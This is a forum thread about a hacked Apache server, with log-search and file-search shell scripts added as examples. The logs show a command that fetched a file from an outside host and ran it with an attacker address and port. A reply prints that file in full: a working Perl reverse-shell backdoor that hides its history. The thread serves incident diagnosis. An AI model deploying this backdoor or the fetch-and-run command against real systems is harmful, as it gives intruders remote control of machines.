jonfr Veteran
Joined: 20 Jul 2003 Posts: 1008 Location: Denmark
Posted: Sat Jul 10, 2010 5:53 pm Post subject: Apache server hacked ?
After a recent problem with a server that I am hosting, I wanted to check whether it had been hacked or not. So I checked for errors, and I found this in the Apache log. My checking is not finished yet.
Code:
[Wed Jul 07 03:10:14 2010] [notice] Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.2.11-pl1-gentoo configured -- resuming normal operations
[Wed Jul 07 11:00:07 2010] [error] [client 67.195.112.86] File does not exist: /var/www/localhost/htdocs/alvaranbiz/robots.txt
[Wed Jul 07 11:51:24 2010] [error] [client 67.218.116.164] File does not exist: /var/www/localhost/htdocs/robots.txt
[Wed Jul 07 12:28:49 2010] [error] [client 208.80.193.39] (13)Permission denied: file permissions deny server access: /var/www/localhost/htdocs/index.html
[Wed Jul 07 23:41:54 2010] [error] [client 69.58.178.29] File does not exist: /var/www/localhost/htdocs/alvaranbiz/robots.txt
--2010-07-08 08:58:41-- http://xilografical.altervista.org/vvx/c.txt
Resolving xilografical.altervista.org... 76.76.105.44
Connecting to xilografical.altervista.org|76.76.105.44|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1967 (1.9K) [text/plain]
Saving to: `c.txt'
0K . 100% 1.55M=0.001s
2010-07-08 08:58:41 (1.55 MB/s) - `c.txt' saved [1967/1967]
sh: line 1: 15197 Killed perl c.txt 193.232.68.49 2121
[Fri Jul 09 22:22:07 2010] [notice] Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.2.11-pl1-gentoo configured -- resuming normal operations
[Sat Jul 10 00:38:55 2010] [error] [client 208.80.193.34] (13)Permission denied: file permissions deny server access: /var/www/localhost/htdocs/index.html
[Sat Jul 10 03:10:18 2010] [notice] Graceful restart requested, doing restart
apache2: Syntax error on line 148 of /etc/apache2/httpd.conf: Syntax error on line 4 of /etc/apache2/modules.d/70_mod_php5.conf: Cannot load /usr/lib/apache$
[Sat Jul 10 07:54:37 2010] [warn] pid file /var/run/apache2.pid overwritten -- Unclean shutdown of previous Apache run?
[Sat Jul 10 07:54:37 2010] [notice] Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.2.13-pl0-gentoo configured -- resuming normal operations
[Sat Jul 10 07:55:56 2010] [error] [client 192.168.1.7] (13)Permission denied: file permissions deny server access: /var/www/localhost/htdocs/index.html
[Sat Jul 10 07:55:56 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/favicon.ico
[Sat Jul 10 07:55:59 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/favicon.ico
[Sat Jul 10 07:56:06 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/forum
[Sat Jul 10 07:56:15 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/alvaran
[Sat Jul 10 07:56:18 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/alvaran
[Sat Jul 10 07:56:39 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/forum
[Sat Jul 10 11:51:25 2010] [error] [client 67.218.116.164] File does not exist: /var/www/localhost/htdocs/robots.txt
I am local client 192.168.1.7.
Thanks for the help.
eccerr0r Watchman
Joined: 01 Jul 2004 Posts: 9891 Location: almost Mile High in the USA
Posted: Sat Jul 10, 2010 6:05 pm Post subject:
Yes, this looks very suspicious. Someone managed to find a bug in one of your scripts to get it to download c.txt and then execute it -- all bets are off now. I'm not sure what c.txt does, but apparently someone or something killed it after it was executed (quite possibly the perpetrator...).
I'd scrub the machine down. Nothing is trustable on the machine any more.
I'd look at your access log at around the time when that file was downloaded to see what he did.
BTW: Kudos to you for actually finding this and being sceptical that it's normal. A lot of *ix machines get left there assuming everything is fine and dandy... and then their box gets used to attack other boxes...
*sigh*
BTW: I grabbed a copy of the file c.txt:
Code:
#!/usr/bin/perl
use IO::Socket;
# Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/bash';
$ARGC=@ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "IHS BACK-CONNECT BACKDOOR \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
Yes, it looks like a backdoor. But now I'm not sure if it's still doing anything. In either case, you should carefully audit the machine - ideally reinstall.
_________________
Intel Core i7 2700K/Radeon R7 250/24GB DDR3/256GB SSD
What am I supposed watching?
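The triage step eccerr0r describes (find the access_log requests from the moment c.txt was fetched) can be scripted. The POSIX shell functions below are an added example for this thread, not a command the poster ran: they pull out the error_log lines that are not in Apache's own timestamp format (wget's progress output and the "Killed perl c.txt" line are stdout/stderr of commands run as the web server user, which is why they landed in error_log), read the download time and URL from the wget banner, and list every access_log request from that same minute. The error_log lines in the fixture are those from the thread; the access_log lines, their client addresses (RFC 5737 documentation ranges) and request paths are constructed for the demo.

```shell
#!/bin/sh
# Added example for log triage; not code from the thread.
# error_log lines that do not start with "[Day Mon DD HH:MM:SS YYYY]" are
# output of commands the web server user ran (here wget, then perl).
# POSIX sh; needs grep -E and sed -E (present on GNU and BSD userlands).

# foreign_lines ERROR_LOG: lines that do not start with an Apache timestamp
foreign_lines() {
  grep -vE '^\[[A-Z][a-z]{2} [A-Z][a-z]{2} [0-9 ]{2} [0-9:]{8} [0-9]{4}\]' "$1"
}

# wget_events ERROR_LOG: from wget banners "--YYYY-MM-DD HH:MM:SS--  URL"
# print "YYYY-MM-DD HH:MM URL" (seconds dropped; we search the whole minute)
wget_events() {
  sed -nE 's/^--([0-9]{4}-[0-9]{2}-[0-9]{2}) ([0-9]{2}:[0-9]{2}):[0-9]{2}-- *(.*)$/\1 \2 \3/p' "$1"
}

# to_clf_minute "YYYY-MM-DD HH:MM": the same minute in access_log (CLF)
# notation, "DD/Mon/YYYY:HH:MM"
to_clf_minute() {
  y=${1%%-*}; rest=${1#*-}; m=${rest%%-*}; rest=${rest#*-}; d=${rest%% *}; t=${rest#* }
  case $m in
    01) mon=Jan;; 02) mon=Feb;; 03) mon=Mar;; 04) mon=Apr;; 05) mon=May;; 06) mon=Jun;;
    07) mon=Jul;; 08) mon=Aug;; 09) mon=Sep;; 10) mon=Oct;; 11) mon=Nov;; 12) mon=Dec;;
  esac
  printf '%s/%s/%s:%s\n' "$d" "$mon" "$y" "$t"
}

# requests_near ACCESS_LOG "DD/Mon/YYYY:HH:MM": every request logged in that minute
requests_near() {
  grep -F "[$2" "$1"
}

# triage ERROR_LOG ACCESS_LOG: run the steps above and print the findings
triage() {
  echo "== non-Apache lines in $1 (output of commands run by the web server user) =="
  foreign_lines "$1"
  wget_events "$1" | while read -r day clock url; do
    echo "== requests logged at $day $clock, when $url was fetched =="
    requests_near "$2" "$(to_clf_minute "$day $clock")"
  done
}

# --- demo fixture: error_log lines are from the thread; access_log lines are
# --- constructed (RFC 5737 documentation addresses, invented paths)
ERR=$(mktemp) && ACC=$(mktemp) || exit 1
trap 'rm -f "$ERR" "$ACC"' EXIT
cat >"$ERR" <<'EOF'
[Wed Jul 07 23:41:54 2010] [error] [client 69.58.178.29] File does not exist: /var/www/localhost/htdocs/alvaranbiz/robots.txt
--2010-07-08 08:58:41--  http://xilografical.altervista.org/vvx/c.txt
Resolving xilografical.altervista.org... 76.76.105.44
sh: line 1: 15197 Killed                  perl c.txt 193.232.68.49 2121
[Fri Jul 09 22:22:07 2010] [notice] Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.2.11-pl1-gentoo configured -- resuming normal operations
EOF
cat >"$ACC" <<'EOF'
192.0.2.10 - - [08/Jul/2010:08:57:02 +0200] "GET /forum/ HTTP/1.1" 200 5120
198.51.100.7 - - [08/Jul/2010:08:58:40 +0200] "POST /alvaranbiz/index.php HTTP/1.1" 200 311
192.0.2.10 - - [08/Jul/2010:09:03:11 +0200] "GET /favicon.ico HTTP/1.1" 404 209
EOF

triage "$ERR" "$ACC"
```

On the real box, run `triage /var/log/apache2/error_log /var/log/apache2/access_log` (paths vary by distribution) and read the requests in that minute: the one that hit a PHP script right before the wget banner is the one that was abused, and that tells you which script or application needs patching on the rebuilt machine.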
jonfr Veteran
Joined: 20 Jul 2003 Posts: 1008 Location: Denmark
Posted: Sat Jul 10, 2010 6:17 pm Post subject:
This is not my computer, so I will have to discuss a reformat with the owner. There are no older logs there. I have done updates over the past 24 hours; this problem started when I was not at home, so there was little I could do at the time.
I don't find the c.txt file on my computer, and I don't know how to do a text search in Linux.
I have a rule: I don't trust any computer that is connected to the internet. It does not matter what the computer in question runs as an operating system.
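For the text search the poster asks about, the usual tools are find (by file name or modification time) and grep -r (by file contents). The script below is an added example, not a command from the thread: it wraps those tools in three small functions and runs them with the indicators visible in the log (the file name c.txt, the backdoor's banner string, the host it was downloaded from). The fixture tree is constructed for the demo; on a real box point ROOT at / (or at /tmp, /var/tmp, /dev/shm and the DocumentRoot, where files written by the web server user usually land).

```shell
#!/bin/sh
# Added example, not from the thread: locate a dropped file by name, by
# content and by modification time. POSIX find/grep options only.

# files_named ROOT NAME: regular files under ROOT with exactly that name
files_named() { find "$1" -xdev -type f -name "$2" 2>/dev/null; }

# files_containing ROOT STRING: files under ROOT whose contents contain STRING
# (-F: fixed string, so "." in a host name is not treated as a regex)
files_containing() { grep -rlF -- "$2" "$1" 2>/dev/null; }

# files_modified_within ROOT DAYS: regular files changed in the last DAYS days
files_modified_within() { find "$1" -xdev -type f -mtime "-$2" 2>/dev/null; }

# sweep ROOT: run the three searches with the indicators from the thread
sweep() {
  echo "== files named c.txt under $1 =="
  files_named "$1" c.txt
  echo "== files containing the backdoor's banner string =="
  files_containing "$1" 'IHS BACK-CONNECT BACKDOOR'
  echo "== files containing the download host from the log =="
  files_containing "$1" 'xilografical.altervista.org'
  echo "== files modified in the last 3 days =="
  files_modified_within "$1" 3
}

# --- constructed fixture: a tiny fake root with one decoy copy of the dropped
# --- file (only its banner line as a comment, nothing executable) and one
# --- innocent page
ROOT=$(mktemp -d) || exit 1
trap 'rm -rf "$ROOT"' EXIT
mkdir -p "$ROOT/tmp" "$ROOT/var/www/localhost/htdocs"
printf '# IHS BACK-CONNECT BACKDOOR (decoy for the demo)\n' >"$ROOT/tmp/c.txt"
printf '<html>hello</html>\n' >"$ROOT/var/www/localhost/htdocs/index.html"

sweep "$ROOT"
```

A copy of c.txt is unlikely to still be where perl ran it (the attacker's one-liner ran in the web server's working directory, and it may have been deleted since), so the content and modification-time searches matter more than the name search; and since the machine is compromised, treat anything these commands report as a lead for the investigation, not as proof that the box is clean when they come back empty.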